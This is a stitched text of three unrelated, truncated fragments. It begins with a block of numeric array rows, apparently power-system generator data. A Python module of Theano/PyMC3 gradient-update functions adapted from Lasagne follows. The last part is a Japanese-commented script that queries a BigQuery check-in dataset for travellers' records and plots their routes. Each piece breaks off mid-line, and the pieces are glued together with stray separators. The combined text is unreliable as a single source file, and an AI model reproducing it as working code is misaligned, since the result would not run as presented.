[1150, 2.736041, 0, 9999, -9999, 1.0, 100, 1, 3.62256, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[1151, 11.63465, 0, 9999, -9999, 1.0, 100, 1, 13.036113, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[1152, 0.096385, 0, 9999, -9999, 1.0, 100, 1, 0.116518, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[1153, 0.042769, 0, 9999, -9999, 1.0, 100, 1, 0.068788, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[1154, 0.099868, 0, 9999, -9999, 1.0, 100, 1, 0.160625, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[1155, 0.536079, 0, 9999, -9999, 1.0, 100, 1, 0.609451, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[1156, 8.528687, 0, 9999, -9999, 1.0, 100, 1, 16.022334, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[1157, 3.880705, 0, 9999, -9999, 1.0, 100, 1, 4.354147, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[1158, 0.641152, 0, 9999, -9999, 1.0, 100, 1, 1.04304, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[1159, 7.626711, 0, 9999, -9999, 1.0, 100, 1, 13.498087, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[1160, 172.892569, 0, 9999, -9999, 1.0, 100, 1, 238.377761, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[1161, 5.783428, 0, 9999, -9999, 1.0, 100, 1, 25.263391, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[1162, 346.481068, 0, 9999, -9999, 1.0, 100, 1, 502.409178, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[1163, 208.804718, 0, 9999, -9999, 1.0, 100, 1, 330.03194, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[1164, 225.831056, 0, 9999, -9999, 1.0, 100, 1, 285.625412, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[1165, 40.10023, 0, 9999, -9999, 1.0, 100, 1, 57.188579, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[1166, 61.73277, 0, 9999, -9999, 1.0, 100, 1, 83.277163, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[1167, 3.105793, 0, 9999, -9999, 1.0, 100, 1, 5.05378, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[1168, 0.937339, 0, 9999, -9999, 1.0, 100, 1, 1.345774, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[1169, 2.269192, 0, 9999, -9999, 1.0, 100, 1, 2.721845, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[1170, 0.163597, 0, 9999, -9999, 1.0, 100, 1, 0.26599, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[1171, 2.671755, 0, 9999, -9999, 1.0, 100, 1, 9.029885, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[1172, 0.551228, 0, 9999, -9999, 1.0, 100, 1, 3.584043, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[1173, 179.321558, 0, 9999, -9999, 1.0, 100, 1, 254.253327, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[1174, 0.774417, 0, 9999, -9999, 1.0, 100, 1, 1.260082, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[1175, 0.654572, 0, 9999, -9999, 1.0, 100, 1, 0.855454, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[1176, 0.203207, 0, 9999, -9999, 1.0, 100, 1, 0.23222, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[1177, 21.987815, 0, 9999, -9999, 1.0, 100, 1, 27.87401, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[1178, 2.428114, 0, 9999, -9999, 1.0, 100, 1, 3.167999, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[1179, 1.02202, 0, 9999, -9999, 1.0, 100, 1, 1.306293, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[1180, 0.423394, 0, 9999, -9999, 1.0, 100, 1, 0.688545, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[1181, 72.346644, 0, 9999, -9999, 1.0, 100, 1, 85.739557, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[1182, 90.357464, 0, 9999, -9999, 1.0, 100, 1, 99.319579, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[1183, 22.605841, 0, 9999, -9999, 1.0, 100, 1, 38.222575, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[1184, 3.03572, 0, 9999, -9999, 1.0, 100, 1, 4.219005, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[1185, 5.789482, 0, 9999, -9999, 1.0, 100, 1, 11.343971, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[1186, 30.365724, 0, 9999, -9999, 1.0, 100, 1, 38.916368, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[1187, 7.822855, 0, 9999, -9999, 1.0, 100, 1, 9.814574, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[1188, 120.950251, 0, 9999, -9999, 1.0, 100, 1, 179.712741, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[1190, 20.412862, 0, 9999, -9999, 1.0, 100, 1, 220.533673, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[1191, 11.541946, 0, 9999, -9999, 1.0, 100, 1, 73.079413, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[1192, 0.641801, 0, 9999, -9999, 1.0, 100, 1, 21.454569, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[1193, 0.069317, 0, 9999, -9999, 1.0, 100, 1, 2.399953, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[1194, 0.235549, 0, 9999, -9999, 1.0, 100, 1, 8.986036, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[1195, 0.034093, 0, 9999, -9999, 1.0, 100, 1, 0.202359, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[1196, 126.926131, 0, 9999, -9999, 1.0, 100, 1, 160.697956, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[1197, 66.086696, 0, 9999, -9999, 1.0, 100, 1, 90.592266, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[1198, 29.455528, 0, 9999, -9999, 1.0, 100, 1, 39.819157, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[1199, 154.934818, 0, 9999, -9999, 1.0, 100, 1, 201.421956, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[1200, 49.907599, 0, 9999, -9999, 1.0, 100, 1, 56.012408, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[1201, 0.9656, 0, 9999, -9999, 1.0, 100, 1, 25.166667, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[1202, 1.252694, 0, 9999, -9999, 1.0, 100, 1, 49.89238, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[1203, 7.239319, 0, 9999, -9999, 1.0, 100, 1, 182.623256, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[1204, 32.933382, 0, 9999, -9999, 1.0, 100, 1, 47.541821, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[1205, 0.060996, 0, 9999, -9999, 1.0, 100, 1, 0.548843, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[1206, 0.11359, 0, 9999, -9999, 1.0, 100, 1, 3.806894, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[1207, 0.103269, 0, 9999, -9999, 1.0, 100, 1, 3.575453, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[1208, 0.242227, 0, 9999, -9999, 1.0, 100, 1, 2.242031, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[1209, 0.011906, 0, 9999, -9999, 1.0, 100, 1, 1.268261, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[1210, 1.489975, 0, 9999, -9999, 1.0, 100, 1, 9.02599, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[1211, 3.71803, 0, 9999, -9999, 1.0, 100, 1, 18.005229, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[1212, 16.071779, 0, 9999, -9999, 1.0, 100, 1, 91.171888, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[1213, 14.003597, 0, 9999, -9999, 1.0, 100, 1, 57.342704, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[1214, 0.269686, 0, 9999, -9999, 1.0, 100, 1, 4.505907, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[1215, 0.1434, 0, 9999, -9999, 1.0, 100, 1, 2.252965, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[1216, 6.091928, 0, 9999, -9999, 1.0, 100, 1, 67.754469, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[1217, 4.427853, 0, 9999, -9999, 1.0, 100, 1, 35.871617, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[1218, 0.106354, 0, 9999, -9999, 1.0, 100, 1, 0.980482, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[1219, 9.771661, 0, 9999, -9999, 1.0, 100, 1, 12.33953, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[1220, 18.526097, 0, 9999, -9999, 1.0, 100, 1, 30.597849, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[1221, 30.718044, 0, 9999, -9999, 1.0, 100, 1, 593.230436, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[1222, 48.330044, 0, 9999, -9999, 1.0, 100, 1, 211.057769, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[1223, 0.533002, 0, 9999, -9999, 1.0, 100, 1, 3.806101, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[1224, 0.867056, 0, 9999, -9999, 1.0, 100, 1, 160.523778, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[1225, 13.153778, 0, 9999, -9999, 1.0, 100, 1, 34.931481, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[1226, 2.047114, 0, 9999, -9999, 1.0, 100, 1, 3.982858, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[1227, 7.083334, 0, 9999, -9999, 1.0, 100, 1, 17.482807, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[1228, 0.850314, 0, 9999, -9999, 1.0, 100, 1, 3.021367, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[1229, 40.481646, 0, 9999, -9999, 1.0, 100, 1, 51.244222, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[1230, 0.101941, 0, 9999, -9999, 1.0, 100, 1, 1.681276, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[1231, 5.614499, 0, 9999, -9999, 1.0, 100, 1, 33.55478, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[1232, 9.04332, 0, 9999, -9999, 1.0, 100, 1, 75.075088, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[1233, 397.200611, 0, 9999, -9999, 1.0, 100, 1, 575.36828, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[1235, 7.243964, 0, 9999, -9999, 1.0, 100, 1, 9.03734, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[1236, 65.758234, 0, 9999, -9999, 1.0, 100, 1, 82.225035, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[1237, 4.873307, 0, 9999, -9999, 1.0, 100, 1, 14.605409, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[1238, 24.676711, 0, 9999, -9999, 1.0, 100, 1, 188.691049, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[1239, 1.69401, 0, 9999, -9999, 1.0, 100, 1, 2.267706, 0.0, 0, 0, 0, 0, 0, 0, 0, | |
# Taken from the Lasagne project: http://lasagne.readthedocs.io/en/latest/
# License:
# The MIT License (MIT)
# Copyright (c) 2014-2015 Lasagne contributors
# Lasagne uses a shared copyright model: each contributor holds copyright over
# their contributions to Lasagne. The project versioning records all such
# contribution and copyright details.
# By contributing to the Lasagne repository through pull-request, comment,
# or otherwise, the contributor releases their content to the license and
# copyright terms herein.
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
# The above copyright notice and this permission notice shall be included in all
# copies or substantial portions of the Software.
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
"""
Functions to generate Theano update dictionaries for training.
The update functions implement different methods to control the learning
rate for use with stochastic gradient descent.
Update functions take a loss expression or a list of gradient expressions and
a list of parameters as input and return an ordered dictionary of updates:
.. autosummary::
:nosignatures:
sgd
momentum
nesterov_momentum
adagrad
rmsprop
adadelta
adam
adamax
Two functions can be used to further modify the updates to include momentum:
.. autosummary::
:nosignatures:
apply_momentum
apply_nesterov_momentum
Finally, we provide two helper functions to constrain the norm of tensors:
.. autosummary::
:nosignatures:
norm_constraint
total_norm_constraint
:func:`norm_constraint()` can be used to constrain the norm of parameters
(as an alternative to weight decay), or for a form of gradient clipping.
:func:`total_norm_constraint()` constrains the total norm of a list of tensors.
This is often used when training recurrent neural networks.
Examples
--------
>>> import lasagne
>>> import theano.tensor as tt
>>> import theano
>>> from lasagne.nonlinearities import softmax
>>> from lasagne.layers import InputLayer, DenseLayer, get_output
>>> from lasagne.updates import sgd, apply_momentum
>>> l_in = InputLayer((100, 20))
>>> l1 = DenseLayer(l_in, num_units=3, nonlinearity=softmax)
>>> x = tt.matrix('x') # shp: num_batch x num_features
>>> y = tt.ivector('y') # shp: num_batch
>>> l_out = get_output(l1, x)
>>> params = lasagne.layers.get_all_params(l1)
>>> loss = tt.mean(tt.nnet.categorical_crossentropy(l_out, y))
>>> updates_sgd = sgd(loss, params, learning_rate=0.0001)
>>> updates = apply_momentum(updates_sgd, params, momentum=0.9)
>>> train_function = theano.function([x, y], updates=updates)
Notes
-----
Taken from the Lasagne project: http://lasagne.readthedocs.io/en/latest/
"""
from functools import partial
from collections import OrderedDict
import numpy as np
import theano
import theano.tensor as tt
import pymc3 as pm
__all__ = [
"sgd",
"apply_momentum",
"momentum",
"apply_nesterov_momentum",
"nesterov_momentum",
"adagrad",
"adagrad_window",
"rmsprop",
"adadelta",
"adam",
"adamax",
"norm_constraint",
"total_norm_constraint",
]
def get_or_compute_grads(loss_or_grads, params):
    """Return gradient expressions for *params*.

    Parameters
    ----------
    loss_or_grads : symbolic expression or list of expressions
        A scalar loss expression, or a list of gradient expressions.
    params : list of shared variables
        The variables to return the gradients for.

    Returns
    -------
    list of expressions
        `loss_or_grads` itself when it is already a list of gradients
        (checked to match the length of `params`); otherwise the result of
        ``theano.grad(loss_or_grads, params)``.

    Raises
    ------
    ValueError
        If `loss_or_grads` is a list of a different length than `params`,
        or if any element of `params` is not a shared variable (while we
        could still compute its gradient, we could never update it, so we
        fail early).
    """
    if not all(isinstance(p, theano.compile.SharedVariable) for p in params):
        raise ValueError("params must contain shared variables only. If it "
                         "contains arbitrary parameter expressions, then "
                         "lasagne.utils.collect_shared_vars() may help you.")
    if not isinstance(loss_or_grads, list):
        # A scalar loss expression: differentiate it ourselves.
        return theano.grad(loss_or_grads, params)
    # Caller supplied ready-made gradients; just sanity-check the length.
    if len(loss_or_grads) != len(params):
        raise ValueError("Got %d gradient expressions for %d parameters" %
                         (len(loss_or_grads), len(params)))
    return loss_or_grads
def _get_call_kwargs(_locals_):
_locals_ = _locals_.copy()
_locals_.pop('loss_or_grads')
_locals_.pop('params')
return _locals_
def sgd(loss_or_grads=None, params=None, learning_rate=1e-3):
    """Stochastic Gradient Descent (SGD) updates

    Generates update expressions of the form:

    * ``param := param - learning_rate * gradient``

    Parameters
    ----------
    loss_or_grads : symbolic expression or list of expressions
        A scalar loss expression, or a list of gradient expressions
    params : list of shared variables
        The variables to generate update expressions for
    learning_rate : float or symbolic scalar
        The learning rate controlling the size of update steps

    Returns
    -------
    OrderedDict
        A dictionary mapping each parameter to its update expression

    Notes
    -----
    When called with neither `loss_or_grads` nor `params`, a partial
    function carrying the hyper-parameters is returned instead.

    Examples
    --------
    >>> a = theano.shared(1.)
    >>> b = a*2
    >>> updates = sgd(b, [a], learning_rate=.01)
    >>> isinstance(updates, dict)
    True
    >>> optimizer = sgd(learning_rate=.01)
    >>> callable(optimizer)
    True
    >>> updates = optimizer(b, [a])
    >>> isinstance(updates, dict)
    True
    """
    # Hyper-parameters only: defer building the updates via a partial.
    if loss_or_grads is None and params is None:
        return partial(sgd, **_get_call_kwargs(locals()))
    if loss_or_grads is None or params is None:
        raise ValueError(
            'Please provide both `loss_or_grads` and `params` to get updates')
    grads = get_or_compute_grads(loss_or_grads, params)
    # One plain gradient-descent step per parameter.
    return OrderedDict((param, param - learning_rate * grad)
                       for param, grad in zip(params, grads))
def apply_momentum(updates, params=None, momentum=0.9):
    """Return a modified update dictionary that includes momentum.

    Generates update expressions of the form:

    * ``velocity := momentum * velocity + updates[param] - param``
    * ``param := param + velocity``

    Parameters
    ----------
    updates : OrderedDict
        A dictionary mapping parameters to update expressions
    params : iterable of shared variables, optional
        The variables to apply momentum to. If omitted, will apply
        momentum to all `updates.keys()`.
    momentum : float or symbolic scalar, optional
        The amount of momentum to apply. Higher momentum results in
        smoothing over more update steps. Defaults to 0.9.

    Returns
    -------
    OrderedDict
        A copy of `updates` with momentum updates for all `params`.

    Notes
    -----
    Higher momentum also results in larger update steps. To counter that,
    you can optionally scale your learning rate by `1 - momentum`.

    See Also
    --------
    momentum : Shortcut applying momentum to SGD updates
    """
    result = OrderedDict(updates)
    if params is None:
        params = updates.keys()
    for param in params:
        value = param.get_value(borrow=True)
        # One zero-initialised velocity accumulator per parameter, matching
        # the parameter's shape, dtype and broadcasting pattern.
        velocity = theano.shared(np.zeros(value.shape, dtype=value.dtype),
                                 broadcastable=param.broadcastable)
        step = momentum * velocity + result[param]
        result[velocity] = step - param
        result[param] = step
    return result
def momentum(loss_or_grads=None, params=None,
             learning_rate=1e-3, momentum=0.9):
    """Stochastic Gradient Descent (SGD) updates with momentum

    Generates update expressions of the form:

    * ``velocity := momentum * velocity - learning_rate * gradient``
    * ``param := param + velocity``

    Parameters
    ----------
    loss_or_grads : symbolic expression or list of expressions
        A scalar loss expression, or a list of gradient expressions
    params : list of shared variables
        The variables to generate update expressions for
    learning_rate : float or symbolic scalar
        The learning rate controlling the size of update steps
    momentum : float or symbolic scalar, optional
        The amount of momentum to apply. Higher momentum results in
        smoothing over more update steps. Defaults to 0.9.

    Returns
    -------
    OrderedDict
        A dictionary mapping each parameter to its update expression

    Notes
    -----
    Higher momentum also results in larger update steps. To counter that,
    you can optionally scale your learning rate by `1 - momentum`.

    When called with neither `loss_or_grads` nor `params`, a partial
    function carrying the hyper-parameters is returned instead.

    See Also
    --------
    apply_momentum : Generic function applying momentum to updates
    nesterov_momentum : Nesterov's variant of SGD with momentum

    Examples
    --------
    >>> a = theano.shared(1.)
    >>> b = a*2
    >>> updates = momentum(b, [a], learning_rate=.01)
    >>> isinstance(updates, dict)
    True
    >>> optimizer = momentum(learning_rate=.01)
    >>> callable(optimizer)
    True
    >>> updates = optimizer(b, [a])
    >>> isinstance(updates, dict)
    True
    """
    if loss_or_grads is None and params is None:
        # The `momentum` parameter shadows this function's name inside the
        # body, so the deferred call must go through the module attribute
        # `pm.updates.momentum` rather than the bare name (which here would
        # be the float hyper-parameter).
        return partial(pm.updates.momentum, **_get_call_kwargs(locals()))
    if loss_or_grads is None or params is None:
        raise ValueError(
            'Please provide both `loss_or_grads` and `params` to get updates')
    # Plain SGD steps first, then fold the velocity terms in.
    sgd_updates = sgd(loss_or_grads, params, learning_rate)
    return apply_momentum(sgd_updates, momentum=momentum)
def apply_nesterov_momentum(updates, | |
" + country + "\n")
f3.write("Input Interested Category from User: ")
for key , value in original_input.items():
f3.write(key + ":" +str(value) +",")
f3.write("\nMatched Interested Category: \n")
for key , value in all_interest.items():
f3.write(key + ":" +str(value) +",")
f3.write("\n \n")
f3.write("Top Rankings (Similarity,User Name): " + str(rankings)+ "\n \n")
print(len(rankings))
for u in rankings:
# queryの実行
print("\nUser:" + u[1])
query = 'SELECT VENUE_ID, LATITUDE, LONGITUDE, COUNTRY, HOME, CATEGORY, DATE FROM dataset_TIST2015.Checkins_POIs_Travel_marked WHERE USER_ID = ' + u[1] + ' and TRAVEL = 1 and COUNTRY = \'' + country + '\''
#print(query)
try:
job_id, results = client.query(query, timeout=60)
except BigQueryTimeoutException as e:
print('Exception')
# 日付のフォーマットを変換
for q in results:
q['DATE'] = q['DATE'][4:]
Mon = q['DATE'][:3]
q['DATE'] = q['DATE'][4:]
if Mon == "Jan":
q['DATE'] = "01" + q['DATE']
if Mon == "Feb":
q['DATE'] = "02" + q['DATE']
if Mon == "Mar":
q['DATE'] = "03" + q['DATE']
if Mon == "Apr":
q['DATE'] = "04" + q['DATE']
if Mon == "May":
q['DATE'] = "05" + q['DATE']
if Mon == "Jun":
q['DATE'] = "06" + q['DATE']
if Mon == "Jul":
q['DATE'] = "07" + q['DATE']
if Mon == "Aug":
q['DATE'] = "08" + q['DATE']
if Mon == "Sep":
q['DATE'] = "09" + q['DATE']
if Mon == "Oct":
q['DATE'] = "10" + q['DATE']
if Mon == "Nov":
q['DATE'] = "11" + q['DATE']
if Mon == "Dec":
q['DATE'] = "12" + q['DATE']
YEAR = q['DATE'][len(q['DATE'])-4:len(q['DATE'])]
q['DATE'] = YEAR + q['DATE'][:len(q['DATE'])-4]
# 結果の表示
results.sort(key=lambda x: x['DATE'])
total_weight = 0
time_counter = 0
previous_venue = "" # Version21で追加
previous_date = "" # Version21で追加
# 入力される Country Nameが JPの時だけ VENUE_NAMEで出力するように対応
location_name_dictionary = {}
if (country == "JP"):
location_name_dictionary = location_name = get_venue_names_from_venue_ids([q['VENUE_ID'] for q in results])
location_name = ""
previous_venue = "0"
for q in results:
if q['VENUE_ID'] in location_name_dictionary:
location_name = location_name_dictionary[q['VENUE_ID']]
else:
location_name = q['VENUE_ID']
counter = 0
for key_category , weight in all_interest.items():
if (key_category == q['CATEGORY']):
counter = weight
print(q['DATE'] + ', ' + q['CATEGORY'] + ', ' + location_name + ", Weight:" + str(counter))
# print(q['DATE'] + ',' + q['CATEGORY'] + ',' + str(q['LONGITUDE']) + ',' + str(q['LATITUDE']) + ',' + q['VENUE_ID'])
# Output1へ書き込み:主観的評価用(岡部さん用):ここから
f = open("output_result " + timestamp + ".txt", "a" ,encoding='utf-8')
# f = open("output_result.txt", "a" ,encoding='utf-8')
writing_information =(q['DATE'] + ', ' + q['CATEGORY'] + ', ' + location_name + ", Weight:" + str(counter) + ", Similarity:" + str("{0:.4f}".format(u[0])))
# writing_information =(q['DATE'] + ',' + q['CATEGORY'] + ',' + str(q['LONGITUDE']) + ',' + str(q['LATITUDE']) + ',' + get_venue_name_from_venue_id(q['VENUE_ID']) + ",weight:" + str(counter))
f.write(("user:" + u[1]) + ', ')
f.write(writing_information+"\n")
# Output1へ書き込み:ここまで
# Output2へ書き込み:客観的評価用(パッタラ用):ここから
counter = 0
# print(q['VENUE_ID'])
if (previous_venue != q['VENUE_ID'] and previous_date != q['DATE']):
for key_category , weight in all_interest.items():
if (key_category == q['CATEGORY']):
time_counter += 1
counter = weight
total_weight += weight
previous_venue = q['VENUE_ID']
previous_date = q['DATE']
writing_information =(q['DATE'] + ', ' + q['CATEGORY'] + ', ' + location_name + ", Weight:" + str(counter))
f2.write(("user:" + u[1]) + ',')
f2.write(writing_information+"\n")
if (counter>0):
writing_information =(q['DATE'] + ', ' + q['CATEGORY'] + ', ' + location_name + ", Weight:" + str(counter))
f3.write(("user:" + u[1]) + ',')
f3.write(writing_information+"\n")
f2.write("Sum Weight = " + str(total_weight) + ", Similarity = " + str("{0:.4f}".format(u[0])) + ", Number of correspond place = "+ str(time_counter) + "\n \n")
f3.write("Sum Weight = " + str(total_weight) + ", Similarity = " + str("{0:.4f}".format(u[0])) + "\n \n")
print("Sum Weight = " + str(total_weight))
# Output2へ書き込み:ここまで
lngs = [float(q['LONGITUDE']) for q in results]
lats = [float(q['LATITUDE']) for q in results]
# get_venue_names_from_venue_ids([q['VENUE_ID'] for q in results])
#earth.drawcoastlines(color='#555566', linewidth=1)
# set japanese font
font = {'family' : 'IPAexGothic'}
# set Thai font
# font = {'family' : 'Tahoma'}
# 地図へ表示させる部分
# plt.plot(lngs, lats, '-o', label=u[1] , markersize=5)
axs[0].plot(lngs, lats, '-o', label=u[1] , markersize=5)
#place name in the map.
for q in results :
if q['VENUE_ID'] in location_name_dictionary:
location_name2 = location_name_dictionary[q['VENUE_ID']]
else:
location_name2 = q['VENUE_ID']
# axs[0].text(float(q['LONGITUDE']), float(q['LATITUDE']), location_name2, dict(size=7),**font)
# plt.text(float(q['LONGITUDE']), float(q['LATITUDE']), location_name2, dict(size=7),**font)
axs[0].set_title('Travel Records of Top Rankings Persons',**font)
# plt.title('Travel Records of Top Rankings Persons',**font)
# plt.title('Travel Records of people who prefer checkin-spots similar to Traveler ' + person)
plt.legend(loc=4)
#Travel Records by User.
# p2 = plt.subplot(1, 2, 2)
# to check that array is which in rankings.
ranking_number = -1
next_button = None
# axs[1] = plt.subplot(2, 2, 2 )
# axs[2] = plt.subplot(2, 2, 4 )
axs[2] = plt.subplot(1, 2, 2 )
axs[2].axis([0, 10, 0, 100])
#fuction for command button Next
def next_user(event) :
print("\nWating .....", end="")
nonlocal ranking_number
# axs[0].cla()
axs[2].cla()
axs[2].axis([0, 10, 0, 100])
ranking_number += 1
#check if list index out of range to set start rankings[0]
if(ranking_number == len(rankings)) :
ranking_number = 0
for u in rankings:
#check user, Which that
user = np.array(rankings[ranking_number])
if(u[1] == user[1]) :
# queryの実行
print("\nTravel record of User:" + u[1])
query = 'SELECT VENUE_ID, LATITUDE, LONGITUDE, COUNTRY, HOME, CATEGORY, DATE FROM dataset_TIST2015.Checkins_POIs_Travel_marked WHERE USER_ID = ' + u[1] + ' and TRAVEL = 1 and COUNTRY = \'' + country + '\''
#print(query)
try:
job_id, results = client.query(query, timeout=60)
except BigQueryTimeoutException as e:
print('Exception')
# 日付のフォーマットを変換
for q in results:
q['DATE'] = q['DATE'][4:]
Mon = q['DATE'][:3]
q['DATE'] = q['DATE'][4:]
if Mon == "Jan":
q['DATE'] = "01" + q['DATE']
if Mon == "Feb":
q['DATE'] = "02" + q['DATE']
if Mon == "Mar":
q['DATE'] = "03" + q['DATE']
if Mon == "Apr":
q['DATE'] = "04" + q['DATE']
if Mon == "May":
q['DATE'] = "05" + q['DATE']
if Mon == "Jun":
q['DATE'] = "06" + q['DATE']
if Mon == "Jul":
q['DATE'] = "07" + q['DATE']
if Mon == "Aug":
q['DATE'] = "08" + q['DATE']
if Mon == "Sep":
q['DATE'] = "09" + q['DATE']
if Mon == "Oct":
q['DATE'] = "10" + q['DATE']
if Mon == "Nov":
q['DATE'] = "11" + q['DATE']
if Mon == "Dec":
q['DATE'] = "12" + q['DATE']
YEAR = q['DATE'][len(q['DATE'])-4:len(q['DATE'])]
q['DATE'] = YEAR + q['DATE'][:len(q['DATE'])-4]
# 結果の表示
results.sort(key=lambda x: x['DATE'])
total_weight = 0
time_counter = 0
previous_venue = "" # Version21で追加
previous_date = "" # Version21で追加
# Output2へ書き込み:ここまで
lngs = [float(q['LONGITUDE']) for q in results]
lats = [float(q['LATITUDE']) for q in results]
